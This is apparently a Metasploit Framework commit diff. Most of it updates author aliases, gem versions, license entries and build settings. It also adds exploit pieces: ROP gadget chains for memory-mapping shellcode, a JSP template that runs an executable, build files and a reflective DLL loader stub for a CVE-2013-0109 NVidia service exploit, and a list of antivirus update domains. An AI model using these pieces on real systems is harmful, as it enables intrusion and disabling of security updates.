commit
dfe4e334fc
14
.mailmap
14
.mailmap
|
@ -2,6 +2,7 @@ bturner-r7 <bturner-r7@github> Brandon Turner <brandon_turner@rapid7.com>
|
||||||
dmaloney-r7 <dmaloney-r7@github> David Maloney <David_Maloney@rapid7.com>
|
dmaloney-r7 <dmaloney-r7@github> David Maloney <David_Maloney@rapid7.com>
|
||||||
dmaloney-r7 <dmaloney-r7@github> David Maloney <DMaloney@rapid7.com> # aka TheLightCosine
|
dmaloney-r7 <dmaloney-r7@github> David Maloney <DMaloney@rapid7.com> # aka TheLightCosine
|
||||||
ecarey-r7 <ecarey-r7@github> Erran Carey <e@ipwnstuff.com>
|
ecarey-r7 <ecarey-r7@github> Erran Carey <e@ipwnstuff.com>
|
||||||
|
farias-r7 <farias-r7@github> Fernando Arias <fernando_arias@rapid7.com>
|
||||||
hmoore-r7 <hmoore-r7@github> HD Moore <hd_moore@rapid7.com>
|
hmoore-r7 <hmoore-r7@github> HD Moore <hd_moore@rapid7.com>
|
||||||
hmoore-r7 <hmoore-r7@github> HD Moore <hdm@digitaloffense.net>
|
hmoore-r7 <hmoore-r7@github> HD Moore <hdm@digitaloffense.net>
|
||||||
jlee-r7 <jlee-r7@github> egypt <egypt@metasploit.com> # aka egypt
|
jlee-r7 <jlee-r7@github> egypt <egypt@metasploit.com> # aka egypt
|
||||||
|
@ -13,14 +14,16 @@ jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <juan.vazquez@metasploit.com>
|
||||||
jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <juan_vazquez@rapid7.com>
|
jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <juan_vazquez@rapid7.com>
|
||||||
limhoff-r7 <limhoff-r7@github> Luke Imhoff <luke_imhoff@rapid7.com>
|
limhoff-r7 <limhoff-r7@github> Luke Imhoff <luke_imhoff@rapid7.com>
|
||||||
shuckins-r7 <shuckins-r7@github> Samuel Huckins <samuel_huckins@rapid7.com>
|
shuckins-r7 <shuckins-r7@github> Samuel Huckins <samuel_huckins@rapid7.com>
|
||||||
tasos-r7 <tasos-r7@github> Tasos Laskos <Tasos_Laskos@rapid7.com>
|
|
||||||
todb-r7 <todb-r7@github> Tod Beardsley <tod_beardsley@rapid7.com>
|
todb-r7 <todb-r7@github> Tod Beardsley <tod_beardsley@rapid7.com>
|
||||||
todb-r7 <todb-r7@github> Tod Beardsley <todb@metasploit.com>
|
todb-r7 <todb-r7@github> Tod Beardsley <todb@metasploit.com>
|
||||||
|
todb-r7 <todb-r7@github> Tod Beardsley <todb@packetfu.com>
|
||||||
|
trosen-r7 <trosen-r7@github> Trevor Rosen <Trevor_Rosen@rapid7.com>
|
||||||
wchen-r7 <wchen-r7@github> sinn3r <msfsinn3r@gmail.com> # aka sinn3r
|
wchen-r7 <wchen-r7@github> sinn3r <msfsinn3r@gmail.com> # aka sinn3r
|
||||||
wchen-r7 <wchen-r7@github> sinn3r <wei_chen@rapid7.com>
|
wchen-r7 <wchen-r7@github> sinn3r <wei_chen@rapid7.com>
|
||||||
wchen-r7 <wchen-r7@github> Wei Chen <Wei_Chen@rapid7.com>
|
wchen-r7 <wchen-r7@github> Wei Chen <Wei_Chen@rapid7.com>
|
||||||
wvu-r7 <wvu-r7@github> William Vu <William_Vu@rapid7.com>
|
wvu-r7 <wvu-r7@github> William Vu <William_Vu@rapid7.com>
|
||||||
wvu-r7 <wvu-r7@github> William Vu <wvu@metasploit.com>
|
wvu-r7 <wvu-r7@github> William Vu <wvu@metasploit.com>
|
||||||
|
wvu-r7 <wvu-r7@github> William Vu <wvu@nmt.edu>
|
||||||
|
|
||||||
# Above this line are current Rapid7 employees. Below this paragraph are
|
# Above this line are current Rapid7 employees. Below this paragraph are
|
||||||
# volunteers, former employees, and potential Rapid7 employees who, at
|
# volunteers, former employees, and potential Rapid7 employees who, at
|
||||||
|
@ -72,9 +75,18 @@ OJ <oj@github> OJ Reeves <oj@buffered.io>
|
||||||
OJ <oj@github> OJ <oj@buffered.io>
|
OJ <oj@github> OJ <oj@buffered.io>
|
||||||
r3dy <r3dy@github> Royce Davis <r3dy@Royces-MacBook-Pro.local>
|
r3dy <r3dy@github> Royce Davis <r3dy@Royces-MacBook-Pro.local>
|
||||||
r3dy <r3dy@github> Royce Davis <royce.e.davis@gmail.com>
|
r3dy <r3dy@github> Royce Davis <royce.e.davis@gmail.com>
|
||||||
|
Rick Flores <0xnanoquetz9l@gmail.com> Rick Flores (nanotechz9l) <0xnanoquetz9l@gmail.com>
|
||||||
rsmudge <rsmudge@github> Raphael Mudge <rsmudge@gmail.com> # Aka `butane
|
rsmudge <rsmudge@github> Raphael Mudge <rsmudge@gmail.com> # Aka `butane
|
||||||
schierlm <schierlm@github> Michael Schierl <schierlm@gmx.de> # Aka mihi
|
schierlm <schierlm@github> Michael Schierl <schierlm@gmx.de> # Aka mihi
|
||||||
scriptjunkie <scriptjunkie@github> Matt Weeks <scriptjunkie@scriptjunkie.us>
|
scriptjunkie <scriptjunkie@github> Matt Weeks <scriptjunkie@scriptjunkie.us>
|
||||||
skape <skape@???> Matt Miller <mmiller@hick.org>
|
skape <skape@???> Matt Miller <mmiller@hick.org>
|
||||||
spoonm <spoonm@github> Spoon M <spoonm@gmail.com>
|
spoonm <spoonm@github> Spoon M <spoonm@gmail.com>
|
||||||
swtornio <swtornio@github> Steve Tornio <swtornio@gmail.com>
|
swtornio <swtornio@github> Steve Tornio <swtornio@gmail.com>
|
||||||
|
Tasos Laskos <Tasos_Laskos@rapid7.com> Tasos Laskos <Tasos_Laskos@rapid7.com>
|
||||||
|
TrustedSec <davek@trustedsec.com> trustedsec <davek@trustedsec.com>
|
||||||
|
|
||||||
|
# Aliases for utility author names. Since they're fake, typos abound
|
||||||
|
|
||||||
|
Tab Assassin <tabassassin@metasploit.com> Tabasssassin <tabassassin@metasploit.com>
|
||||||
|
Tab Assassin <tabassassin@metasploit.com> Tabassassin <tabassassin@metasploit.com>
|
||||||
|
Tab Assassin <tabassassin@metasploit.com> TabAssassin <tabasssassin@metasploit.com>
|
||||||
|
|
4
Gemfile
4
Gemfile
|
@ -2,6 +2,8 @@ source 'https://rubygems.org'
|
||||||
|
|
||||||
# Need 3+ for ActiveSupport::Concern
|
# Need 3+ for ActiveSupport::Concern
|
||||||
gem 'activesupport', '>= 3.0.0'
|
gem 'activesupport', '>= 3.0.0'
|
||||||
|
# Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb)
|
||||||
|
gem 'bcrypt-ruby'
|
||||||
# Needed for some admin modules (scrutinizer_add_user.rb)
|
# Needed for some admin modules (scrutinizer_add_user.rb)
|
||||||
gem 'json'
|
gem 'json'
|
||||||
# Needed by msfgui and other rpc components
|
# Needed by msfgui and other rpc components
|
||||||
|
@ -17,7 +19,7 @@ group :db do
|
||||||
# Needed for Msf::DbManager
|
# Needed for Msf::DbManager
|
||||||
gem 'activerecord'
|
gem 'activerecord'
|
||||||
# Database models shared between framework and Pro.
|
# Database models shared between framework and Pro.
|
||||||
gem 'metasploit_data_models', '~> 0.16.6'
|
gem 'metasploit_data_models', '~> 0.16.9'
|
||||||
# Needed for module caching in Mdm::ModuleDetails
|
# Needed for module caching in Mdm::ModuleDetails
|
||||||
gem 'pg', '>= 0.11'
|
gem 'pg', '>= 0.11'
|
||||||
end
|
end
|
||||||
|
|
|
@ -13,6 +13,7 @@ GEM
|
||||||
i18n (~> 0.6, >= 0.6.4)
|
i18n (~> 0.6, >= 0.6.4)
|
||||||
multi_json (~> 1.0)
|
multi_json (~> 1.0)
|
||||||
arel (3.0.2)
|
arel (3.0.2)
|
||||||
|
bcrypt-ruby (3.1.2)
|
||||||
builder (3.0.4)
|
builder (3.0.4)
|
||||||
database_cleaner (1.1.1)
|
database_cleaner (1.1.1)
|
||||||
diff-lcs (1.2.4)
|
diff-lcs (1.2.4)
|
||||||
|
@ -21,7 +22,7 @@ GEM
|
||||||
fivemat (1.2.1)
|
fivemat (1.2.1)
|
||||||
i18n (0.6.5)
|
i18n (0.6.5)
|
||||||
json (1.8.0)
|
json (1.8.0)
|
||||||
metasploit_data_models (0.16.6)
|
metasploit_data_models (0.16.9)
|
||||||
activerecord (>= 3.2.13)
|
activerecord (>= 3.2.13)
|
||||||
activesupport
|
activesupport
|
||||||
pg
|
pg
|
||||||
|
@ -61,11 +62,12 @@ PLATFORMS
|
||||||
DEPENDENCIES
|
DEPENDENCIES
|
||||||
activerecord
|
activerecord
|
||||||
activesupport (>= 3.0.0)
|
activesupport (>= 3.0.0)
|
||||||
|
bcrypt-ruby
|
||||||
database_cleaner
|
database_cleaner
|
||||||
factory_girl (>= 4.1.0)
|
factory_girl (>= 4.1.0)
|
||||||
fivemat (= 1.2.1)
|
fivemat (= 1.2.1)
|
||||||
json
|
json
|
||||||
metasploit_data_models (~> 0.16.6)
|
metasploit_data_models (~> 0.16.9)
|
||||||
msgpack
|
msgpack
|
||||||
network_interface (~> 0.0.1)
|
network_interface (~> 0.0.1)
|
||||||
nokogiri
|
nokogiri
|
||||||
|
|
87
LICENSE
87
LICENSE
|
@ -41,93 +41,10 @@ Copyright: 2004-2005 vlad902 <vlad902 [at] gmail.com>
|
||||||
2007 H D Moore <hdm [at] metasploit.com>
|
2007 H D Moore <hdm [at] metasploit.com>
|
||||||
License: GPL-2 and Artistic
|
License: GPL-2 and Artistic
|
||||||
|
|
||||||
Files: external/source/meterpreter/ReflectiveDLLInjection/*
|
Files: external/source/ReflectiveDLLInjection/*
|
||||||
Copyright: 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
|
Copyright: 2011, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
|
||||||
License: BSD-3-clause
|
License: BSD-3-clause
|
||||||
|
|
||||||
Files: external/source/meterpreter/source/common/queue.h
|
|
||||||
Copyright: 1991, 1993 The Regents of the University of California
|
|
||||||
License: BSD-3-clause
|
|
||||||
|
|
||||||
Files: external/source/meterpreter/source/common/zlib/* external/source/meterpreter/source/server/zlib/*
|
|
||||||
Copyright: 1995-1996 Jean-loup Gailly and Mark Adler
|
|
||||||
License: Zlib
|
|
||||||
|
|
||||||
Files: external/source/meterpreter/source/bionic/libc/*
|
|
||||||
Copyright: 2005-2008, The Android Open Source Project
|
|
||||||
2004 by Internet Systems Consortium, Inc. ("ISC")
|
|
||||||
1995,1996,1999 by Internet Software Consortium
|
|
||||||
1995 by International Business Machines, Inc.
|
|
||||||
1997,1998,1999,2004 The NetBSD Foundation, Inc.
|
|
||||||
1993 Christopher G. Demetriou
|
|
||||||
1983,1985,1989,1993 The Regents of the University of California
|
|
||||||
2000 Ben Harris
|
|
||||||
1995,1996,1997,1998 WIDE Project
|
|
||||||
2003 Networks Associates Technology, Inc.
|
|
||||||
1993 by Digital Equipment Corporation
|
|
||||||
1997 Mark Brinicombe
|
|
||||||
1993 Martin Birgmeier
|
|
||||||
1993 by Sun Microsystems, Inc.
|
|
||||||
1997, 2005 Todd C. Miller <Todd.Miller@courtesan.com>
|
|
||||||
1995, 1996 Carnegie-Mellon University
|
|
||||||
2003 Networks Associates Technology, Inc.
|
|
||||||
License: BSD-3-clause and BSD-4-clause
|
|
||||||
|
|
||||||
Files: external/source/meterpreter/source/bionic/libdl/*
|
|
||||||
Copyright: 2007 The Android Open Source Project
|
|
||||||
License: BSD-3-clause
|
|
||||||
|
|
||||||
Files: external/source/meterpreter/source/bionic/libm/*
|
|
||||||
Copyright: 2003, Steven G. Kargl
|
|
||||||
2003 Mike Barcroft <mike@FreeBSD.org>
|
|
||||||
2002-2005 David Schultz <das@FreeBSD.ORG>
|
|
||||||
2004 Stefan Farfeleder
|
|
||||||
2003 Dag-Erling Coïdan Smørgrav
|
|
||||||
1996 The NetBSD Foundation, Inc.
|
|
||||||
1985,1988,1991,1992,1993 The Regents of the University of California
|
|
||||||
1993,94 Winning Strategies, Inc.
|
|
||||||
1993, 2004 by Sun Microsystems, Inc.
|
|
||||||
License: BSD-2-clause and BSD-3-clause and BSD-4-clause
|
|
||||||
|
|
||||||
Files: external/source/meterpreter/source/extensions/espia/screen.c
|
|
||||||
Copyright: 1994-2008, Mark Hammond
|
|
||||||
License: BSD-2-clause
|
|
||||||
|
|
||||||
Files: external/source/meterpreter/source/extensions/priv/server/timestomp.c
|
|
||||||
Copyright: 2005 Vincent Liu
|
|
||||||
License: GPL-2
|
|
||||||
|
|
||||||
Files: external/source/meterpreter/source/extensions/stdapi/server/webcam/bmp2jpeg.c external/source/meterpreter/source/screenshot/bmp2jpeg.c
|
|
||||||
Copyright: 1994-2008, Mark Hammond
|
|
||||||
License: BSD-2-clause
|
|
||||||
|
|
||||||
Files: external/source/meterpreter/source/extensions/stdapi/server/railgun/railgun.c
|
|
||||||
Copyright: 2010, patrickHVE@googlemail.com
|
|
||||||
License: BSD-2-clause
|
|
||||||
|
|
||||||
Files: external/source/meterpreter/source/pssdk/*
|
|
||||||
Copyright: microOLAP
|
|
||||||
License: N/A
|
|
||||||
Comment: HD Moore holds a single-seat developer license for the Packet Sniffer
|
|
||||||
SDK library embedded into the Meterpreter Sniffer extension. This
|
|
||||||
source code is not distributed with Metasploit Framework.
|
|
||||||
|
|
||||||
Files: external/source/meterpreter/source/openssl/*
|
|
||||||
Copyright: 1998-2002 The OpenSSL Project
|
|
||||||
License: OpenSSL and SSLeay
|
|
||||||
|
|
||||||
Files: external/source/meterpreter/source/server/posix/sfsyscall.h
|
|
||||||
Copyright: 2003 Philippe Biondi <biondi@cartel-securite.fr>
|
|
||||||
License: LGPL
|
|
||||||
|
|
||||||
Files: external/source/meterpreter/source/jpeg-8/*
|
|
||||||
Copyright: 1991-2010, Thomas G. Lane, Guido Vollbeding
|
|
||||||
License: BSD-3-clause
|
|
||||||
|
|
||||||
Files: external/source/meterpreter/source/libpcap/*
|
|
||||||
Copyright: 1990, 1991, 1992, 1993, 1994, 1995, 1996, 1997 The Regents of the University of California.
|
|
||||||
License: BSD-4-clause
|
|
||||||
|
|
||||||
Files: external/source/metsvc/*
|
Files: external/source/metsvc/*
|
||||||
Copyright: 2007, Determina Inc.
|
Copyright: 2007, Determina Inc.
|
||||||
License: BSD-3-clause
|
License: BSD-3-clause
|
||||||
|
|
Binary file not shown.
|
@ -0,0 +1,132 @@
|
||||||
|
<?xml version="1.0" encoding="ISO-8859-1"?>
|
||||||
|
<db>
|
||||||
|
|
||||||
|
<rop>
|
||||||
|
<compatibility>
|
||||||
|
<target>9</target>
|
||||||
|
</compatibility>
|
||||||
|
|
||||||
|
<gadgets base="0x4a800000">
|
||||||
|
<gadget offset="0x2313d">pop ecx # ret</gadget>
|
||||||
|
<gadget offset="0x2a713">push eax # pop esp # ret</gadget>
|
||||||
|
<gadget offset="0x01f90">pop eax # ret</gadget>
|
||||||
|
<gadget offset="0x49038">ptr to CreateFileMappingA()</gadget>
|
||||||
|
<gadget offset="0x07e7d">call [eax] # ret</gadget>
|
||||||
|
<gadget value="0xffffffff">HANDLE hFile</gadget>
|
||||||
|
<gadget value="0x00000000">LPSECURITY_ATTRIBUTES lpAttributes</gadget>
|
||||||
|
<gadget value="0x00000040">DWORD flProtect</gadget>
|
||||||
|
<gadget value="0x00000000">DWORD dwMaximumSizeHigh</gadget>
|
||||||
|
<gadget value="0x00001000">DWORD dwMaximumSizeHigh</gadget>
|
||||||
|
<gadget value="0x00000000">LPCTSTR lpName</gadget>
|
||||||
|
<gadget offset="0x0155a">pop edi # ret</gadget>
|
||||||
|
<gadget offset="0x43a84">pop ebp # pop ebx # pop ecx # ret</gadget>
|
||||||
|
<gadget offset="0x2d4de">pop ebx # ret</gadget>
|
||||||
|
<gadget offset="0x01f90">pop eax # ret</gadget>
|
||||||
|
<gadget offset="0x476aa">pop ecx # ret</gadget>
|
||||||
|
<gadget offset="0x49030">ptr to MapViewOfFile()</gadget>
|
||||||
|
<gadget offset="0x44122">mov edx, ecx</gadget>
|
||||||
|
<gadget offset="0x476aa">pop ecx # ret</gadget>
|
||||||
|
<gadget offset="0x07e7d">call [eax] # ret</gadget>
|
||||||
|
<gadget offset="0x13178">pushad # add al, 0 # ret</gadget>
|
||||||
|
<gadget value="0x00000026">DWORD dwDesiredAccess</gadget>
|
||||||
|
<gadget value="0x00000000">DWORD dwFileOffsetHigh</gadget>
|
||||||
|
<gadget value="0x00000000">DWORD dwFileOffsetLow</gadget>
|
||||||
|
<gadget value="0x00000000">SIZE_T dwNumberOfBytesToMap</gadget>
|
||||||
|
<gadget offset="0x43a82">pop edi # pop esi # pop ebp # pop ebx # pop ecx # ret</gadget>
|
||||||
|
<gadget offset="0x46c5e">jmp IAT msvcr80!memcpy</gadget>
|
||||||
|
<gadget offset="0x476ab">ret</gadget>
|
||||||
|
<gadget value="junk">JUNK</gadget>
|
||||||
|
<gadget value="0x00000400">memcpy length</gadget>
|
||||||
|
<gadget value="junk">JUNK</gadget>
|
||||||
|
<gadget offset="0x17984">xchg eax, ebp # ret</gadget>
|
||||||
|
<gadget offset="0x13178">pushad # add al, 0 # ret</gadget>
|
||||||
|
</gadgets>
|
||||||
|
</rop>
|
||||||
|
|
||||||
|
<rop>
|
||||||
|
<compatibility>
|
||||||
|
<target>10</target>
|
||||||
|
</compatibility>
|
||||||
|
|
||||||
|
<gadgets base="0x4a800000">
|
||||||
|
<gadget offset="0x26015">pop ecx # ret</gadget>
|
||||||
|
<gadget offset="0x2e090">push eax # pop esp # ret</gadget>
|
||||||
|
<gadget offset="0x2007d">pop eax # ret</gadget>
|
||||||
|
<gadget offset="0x50038">ptr to CreateFileMappingA()</gadget>
|
||||||
|
<gadget offset="0x246d5">call [eax] # ret</gadget>
|
||||||
|
<gadget value="0xffffffff">HANDLE hFile</gadget>
|
||||||
|
<gadget value="0x00000000">LPSECURITY_ATTRIBUTES lpAttributes</gadget>
|
||||||
|
<gadget value="0x00000040">DWORD flProtect</gadget>
|
||||||
|
<gadget value="0x00000000">DWORD dwMaximumSizeHigh</gadget>
|
||||||
|
<gadget value="0x00001000">DWORD dwMaximumSizeHigh</gadget>
|
||||||
|
<gadget value="0x00000000">LPCTSTR lpName</gadget>
|
||||||
|
<gadget offset="0x05016">pop edi # ret</gadget>
|
||||||
|
<gadget offset="0x4420c">pop ebp # pop ebx # pop ecx # ret</gadget>
|
||||||
|
<gadget offset="0x14241">pop ebx # ret</gadget>
|
||||||
|
<gadget offset="0x2007d">pop eax # ret</gadget>
|
||||||
|
<gadget offset="0x26015">pop ecx # ret</gadget>
|
||||||
|
<gadget offset="0x50030">ptr to MapViewOfFile()</gadget>
|
||||||
|
<gadget offset="0x4b49d">mov edx, ecx</gadget>
|
||||||
|
<gadget offset="0x26015">pop ecx # ret</gadget>
|
||||||
|
<gadget offset="0x246d5">call [eax] # ret</gadget>
|
||||||
|
<gadget offset="0x14197">pushad # add al, 0 # ret</gadget>
|
||||||
|
<gadget value="0x00000026">DWORD dwDesiredAccess</gadget>
|
||||||
|
<gadget value="0x00000000">DWORD dwFileOffsetHigh</gadget>
|
||||||
|
<gadget value="0x00000000">DWORD dwFileOffsetLow</gadget>
|
||||||
|
<gadget value="0x00000000">SIZE_T dwNumberOfBytesToMap</gadget>
|
||||||
|
<gadget offset="0x14013">pop edi # pop esi # pop ebp # pop ebx # pop ecx # ret</gadget>
|
||||||
|
<gadget offset="0x4e036">jmp to IAT msvcr90!memcpy</gadget>
|
||||||
|
<gadget offset="0x2a8df">ret</gadget>
|
||||||
|
<gadget value="junk">JUNK</gadget>
|
||||||
|
<gadget value="0x00000400">memcpy length</gadget>
|
||||||
|
<gadget value="junk">JUNK</gadget>
|
||||||
|
<gadget offset="0x18b31">xchg eax, ebp # ret</gadget>
|
||||||
|
<gadget offset="0x14197">pushad # add al, 0 # ret</gadget>
|
||||||
|
</gadgets>
|
||||||
|
</rop>
|
||||||
|
|
||||||
|
<rop>
|
||||||
|
<compatibility>
|
||||||
|
<target>11</target>
|
||||||
|
</compatibility>
|
||||||
|
|
||||||
|
<gadgets base="0x4a800000">
|
||||||
|
<gadget offset="0x5822c">pop ecx # ret</gadget>
|
||||||
|
<gadget offset="0x2f129">push eax # pop esp # ret</gadget>
|
||||||
|
<gadget offset="0x5597f">pop eax # ret</gadget>
|
||||||
|
<gadget offset="0x66038">ptr to CreateFileMappingA()</gadget>
|
||||||
|
<gadget offset="0x3f1d5">call [eax] # ret</gadget>
|
||||||
|
<gadget value="0xffffffff">HANDLE hFile</gadget>
|
||||||
|
<gadget value="0x00000000">LPSECURITY_ATTRIBUTES lpAttributes</gadget>
|
||||||
|
<gadget value="0x00000040">DWORD flProtect</gadget>
|
||||||
|
<gadget value="0x00000000">DWORD dwMaximumSizeHigh</gadget>
|
||||||
|
<gadget value="0x00001000">DWORD dwMaximumSizeHigh</gadget>
|
||||||
|
<gadget value="0x00000000">LPCTSTR lpName</gadget>
|
||||||
|
<gadget offset="0x55093">pop edi # ret</gadget>
|
||||||
|
<gadget value="junk">JUNK</gadget>
|
||||||
|
<gadget offset="0x50030">pop ebx # pop esi # pop ebp # ret</gadget>
|
||||||
|
<gadget offset="0x5597f">pop eax # ret</gadget>
|
||||||
|
<gadget offset="0x50031">pop esi # pop ebp # ret</gadget>
|
||||||
|
<gadget value="junk">JUNK</gadget>
|
||||||
|
<gadget offset="0x5822c">pop ecx # ret</gadget>
|
||||||
|
<gadget offset="0x3f1d5">call [eax] # ret</gadget>
|
||||||
|
<gadget offset="0x5d4f8">pop edx # ret</gadget>
|
||||||
|
<gadget offset="0x66030">ptr to MapViewOfFile()</gadget>
|
||||||
|
<gadget offset="0x14864">pushad # add al, 0 # pop ebp # ret</gadget>
|
||||||
|
<gadget value="0x00000026">DWORD dwDesiredAccess</gadget>
|
||||||
|
<gadget value="0x00000000">DWORD dwFileOffsetHigh</gadget>
|
||||||
|
<gadget value="0x00000000">DWORD dwFileOffsetLow</gadget>
|
||||||
|
<gadget value="0x00000000">SIZE_T dwNumberOfBytesToMap</gadget>
|
||||||
|
<gadget offset="0x14856">pop edi # pop esi # pop ebp # ret</gadget>
|
||||||
|
<gadget offset="0x505a0">memcpy address</gadget>
|
||||||
|
<gadget offset="0x60bc4">call eax # ret</gadget>
|
||||||
|
<gadget offset="0x505a0">memcpy address</gadget>
|
||||||
|
<gadget offset="0x1c376">xchg eax, ebp # ret</gadget>
|
||||||
|
<gadget offset="0x463d0">pop ebx # ret</gadget>
|
||||||
|
<gadget value="0x00000400">memcpy length</gadget>
|
||||||
|
<gadget offset="0x5d4f8">pop edx # ret</gadget>
|
||||||
|
<gadget offset="0x5d4f8">pop edx # ret</gadget>
|
||||||
|
<gadget offset="0x14864">pushad # add al, 0 # pop ebp # ret</gadget>
|
||||||
|
</gadgets>
|
||||||
|
</rop>
|
||||||
|
</db>
|
|
@ -44,6 +44,8 @@
|
||||||
}
|
}
|
||||||
else
|
else
|
||||||
{
|
{
|
||||||
Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
|
String[] %{var_exepatharray} = new String[1];
|
||||||
|
%{var_exepatharray}[0] = %{var_exepath};
|
||||||
|
Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepatharray});
|
||||||
}
|
}
|
||||||
%%>
|
%%>
|
||||||
|
|
BIN
data/vncdll.dll
BIN
data/vncdll.dll
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1,28 @@
|
||||||
|
www.es-web.sophos.com
|
||||||
|
www.es-web.sophos.com.edgesuite.net
|
||||||
|
www.es-web-2.sophos.com
|
||||||
|
www.es-web-2.sophos.com.edgesuite.net
|
||||||
|
www.dnl-01.geo.kaspersky.com
|
||||||
|
www.downloads2.kaspersky-labs.com
|
||||||
|
www.liveupdate.symantecliveupdate.com
|
||||||
|
www.liveupdate.symantec.com
|
||||||
|
www.update.symantec.com
|
||||||
|
www.update.nai.com
|
||||||
|
www.download797.avast.com
|
||||||
|
www.guru.avg.com
|
||||||
|
www.osce8-p.activeupdate.trendmicro.com
|
||||||
|
www.forefrontdl.microsoft.com
|
||||||
|
es-web.sophos.com
|
||||||
|
es-web.sophos.com.edgesuite.net
|
||||||
|
es-web-2.sophos.com
|
||||||
|
es-web-2.sophos.com.edgesuite.net
|
||||||
|
dnl-01.geo.kaspersky.com
|
||||||
|
downloads2.kaspersky-labs.com
|
||||||
|
liveupdate.symantecliveupdate.com
|
||||||
|
liveupdate.symantec.com
|
||||||
|
update.symantec.com
|
||||||
|
update.nai.com
|
||||||
|
download797.avast.com
|
||||||
|
guru.avg.com
|
||||||
|
osce8-p.activeupdate.trendmicro.com
|
||||||
|
forefrontdl.microsoft.com
|
File diff suppressed because it is too large
Load Diff
|
@ -1,15 +1 @@
|
||||||
OPTS="-x .ut.rb -x .ts.rb -x samples -q"
|
rake yard
|
||||||
BASE="$(dirname "$0")"
|
|
||||||
MSFDIR="${BASE}/.."
|
|
||||||
DOCDIR="${BASE}/api"
|
|
||||||
doc=$(which sdoc)
|
|
||||||
|
|
||||||
if [ -z $doc ]; then
|
|
||||||
doc=$(which rdoc)
|
|
||||||
fi
|
|
||||||
|
|
||||||
echo "Using ${doc} for doc generation"
|
|
||||||
echo "Putting docs in ${DOCDIR}"
|
|
||||||
|
|
||||||
$doc $OPTS -t "Metasploit Documentation" -o ${DOCDIR} ${MSFDIR}/lib/rex ${MSFDIR}/lib/msf
|
|
||||||
|
|
||||||
|
|
|
@ -70,7 +70,8 @@
|
||||||
<AdditionalOptions>/ignore:4070</AdditionalOptions>
|
<AdditionalOptions>/ignore:4070</AdditionalOptions>
|
||||||
</Link>
|
</Link>
|
||||||
<PostBuildEvent>
|
<PostBuildEvent>
|
||||||
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL</Command>
|
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
|
||||||
|
exit 0</Command>
|
||||||
</PostBuildEvent>
|
</PostBuildEvent>
|
||||||
<ResourceCompile>
|
<ResourceCompile>
|
||||||
<PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
<PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
|
|
@ -0,0 +1,18 @@
|
||||||
|
<?xml version="1.0" standalone="yes"?>
|
||||||
|
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||||
|
<PropertyGroup>
|
||||||
|
<SolutionPath>.\nvidia_nvsvc.sln</SolutionPath>
|
||||||
|
</PropertyGroup>
|
||||||
|
|
||||||
|
<Target Name="all" DependsOnTargets="x86" />
|
||||||
|
|
||||||
|
<Target Name="x86">
|
||||||
|
<Message Text="Building CVE-2013-0109 NVidia nvsvc x86 Release version" />
|
||||||
|
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
|
||||||
|
</Target>
|
||||||
|
|
||||||
|
<Target Name="x64">
|
||||||
|
<Message Text="NVidia nvsvc is not supported in x64" />
|
||||||
|
</Target>
|
||||||
|
</Project>
|
||||||
|
|
|
@ -0,0 +1,22 @@
|
||||||
|
|
||||||
|
Microsoft Visual Studio Solution File, Format Version 12.00
|
||||||
|
# Visual Studio 2013
|
||||||
|
VisualStudioVersion = 12.0.21005.1
|
||||||
|
MinimumVisualStudioVersion = 10.0.40219.1
|
||||||
|
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "nvidia_nvsvc", "nvidia_nvsvc\nvidia_nvsvc.vcxproj", "{6B3FF768-1F25-49C1-8827-EDEC84D4749F}"
|
||||||
|
EndProject
|
||||||
|
Global
|
||||||
|
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||||
|
Debug|Win32 = Debug|Win32
|
||||||
|
Release|Win32 = Release|Win32
|
||||||
|
EndGlobalSection
|
||||||
|
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||||
|
{6B3FF768-1F25-49C1-8827-EDEC84D4749F}.Debug|Win32.ActiveCfg = Debug|Win32
|
||||||
|
{6B3FF768-1F25-49C1-8827-EDEC84D4749F}.Debug|Win32.Build.0 = Debug|Win32
|
||||||
|
{6B3FF768-1F25-49C1-8827-EDEC84D4749F}.Release|Win32.ActiveCfg = Release|Win32
|
||||||
|
{6B3FF768-1F25-49C1-8827-EDEC84D4749F}.Release|Win32.Build.0 = Release|Win32
|
||||||
|
EndGlobalSection
|
||||||
|
GlobalSection(SolutionProperties) = preSolution
|
||||||
|
HideSolutionNode = FALSE
|
||||||
|
EndGlobalSection
|
||||||
|
EndGlobal
|
|
@ -0,0 +1,33 @@
|
||||||
|
//===============================================================================================//
|
||||||
|
// This is a stub for the actual functionality of the DLL.
|
||||||
|
//===============================================================================================//
|
||||||
|
|
||||||
|
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
|
||||||
|
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
|
||||||
|
#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
|
||||||
|
|
||||||
|
#include "nvidia_nvsvc.h"
|
||||||
|
|
||||||
|
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
|
||||||
|
{
|
||||||
|
BOOL bReturnValue = TRUE;
|
||||||
|
switch (dwReason)
|
||||||
|
{
|
||||||
|
case DLL_QUERY_HMODULE:
|
||||||
|
hAppInstance = hinstDLL;
|
||||||
|
if (lpReserved != NULL)
|
||||||
|
{
|
||||||
|
*(HMODULE *)lpReserved = hAppInstance;
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
